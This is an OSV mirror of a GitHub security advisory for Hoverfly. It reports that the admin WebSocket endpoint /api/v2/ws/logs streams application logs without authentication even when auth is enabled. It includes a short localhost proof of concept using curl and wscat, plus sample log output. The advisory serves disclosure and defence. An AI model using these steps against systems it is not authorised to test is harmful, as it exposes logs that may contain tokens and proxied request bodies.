GHSA-jxmr-2h4q-rhxp
Suggest an improvement- Source
- https://github.com/advisories/GHSA-jxmr-2h4q-rhxp
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-jxmr-2h4q-rhxp/GHSA-jxmr-2h4q-rhxp.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-jxmr-2h4q-rhxp
- Aliases
- Published
- 2025-09-10T20:43:49Z
- Modified
- 2025-09-13T03:10:06Z
- Severity
-
- 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled
- Details
-
Summary
Hoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can:
- Stream real-time application logs (information disclosure).
- Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.
PoC
Start Hoverfly with authentication enabled:
./hoverfly -authConfirm REST API requires credentials:
curl -i http://localhost:8888/api/v2/hoverfly/versionConnect to the WebSocket endpoint without credentials:
wscat -c ws://localhost:8888/api/v2/ws/logs # Connected (press CTRL+C to quit) # … logs stream immediately … (You would need to send a message to start receiving stream)
wscat -c ws://localhost:8888/api/v2/ws/logs Connected (press CTRL+C to quit) > hi! < {"logs":[{"level":"info","msg":"Log level set to verbose","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"Using memory backend","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"User added successfully","time":"2025-07-20T17:07:00+05:30","username":""},{"level":"info","msg":"Enabling proxy authentication","time":"2025-07-20T17:07:00+05:30"},{"Destination":".","Mode":"simulate","ProxyPort":"8500","level":"info","msg":"Proxy prepared...","time":"2025-07-20T17:07:00+05:30"},{"destination":".","level":"info","mode":"simulate","msg":"current proxy configuration","port":"8500","time":"2025-07-20T17:07:00+05:30"},{"level":"info","msg":"serving proxy","time":"2025-07-20T17:07:00+05:30"},{"AdminPort":"8888","level":"info","msg":"Admin interface is starting...","time":"2025-07-20T17:07:00+05:30"},{"level":"debug","message":"hi!","msg":"Got message...","time":"2025-07-20T17:09:04+05:30"}]} < ... < ...Impact
Authentication bypass; an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.
- Database specific
{ "severity": "HIGH", "cwe_ids": [ "CWE-200", "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2025-09-10T20:43:49Z", "nvd_published_at": "2025-09-10T20:15:35Z" }- References
Affected packages
Go / github.com/SpectoLabs/hoverfly
Package
- Name
- github.com/SpectoLabs/hoverfly
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/SpectoLabs/hoverfly